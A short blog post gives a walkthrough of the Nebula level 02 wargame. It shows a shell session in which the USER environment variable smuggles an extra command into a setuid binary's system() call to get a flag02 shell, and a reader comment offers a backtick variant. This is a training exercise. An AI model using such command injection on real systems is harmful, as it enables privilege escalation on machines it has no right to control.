Exploit Exersizes Nebula Level 02

Exploit Exersizes Nebula Level 02

Scripting ImageAfter completing Nebula Level 01, I decided to quickly run into Nebula Level 02. After quickly looking at the code they have provided, it came evident that Level01, and Level02 were very similar, just different in the way you launch the exploit. Level01 was exploited by having a script named with the binary that was being called. In this exploit you want to use the USER variable, and assign the code you want to run to it.

Here is what I did to accomplish this exploit:

flag02@nebula:~$ pwd
/home/level02
level02@nebula:~$ chmod g+x exploit 
level02@nebula:~$ USER='-e "I am going to get the flag"; ~/exploit'
level02@nebula:~$ /home/flag02/flag02 
about to call system("/bin/echo -e "I am going to get the flag"; ~/exploit is cool")
I am going to get the flag
flag02@nebula:~$ getflag 
You have successfully executed getflag on a target account

I’m now going to move onto Nebula Level 03, when I get a chance.

UPDATE:
Note: Not sure why the cat of exploit didn’t show (probably issues with wp-syntax and my theme), but exploit was just a script with :
#!/bin/bash
/bin/bash

About ben.kevan

I am ben kevan.. Well yeah. .that's about it. More Posts

1 Comment to “Exploit Exersizes Nebula Level 02”

  1. USER=’`/bin/getflag`”
    ./flag02

Leave a comment

Your email address will not be published.

*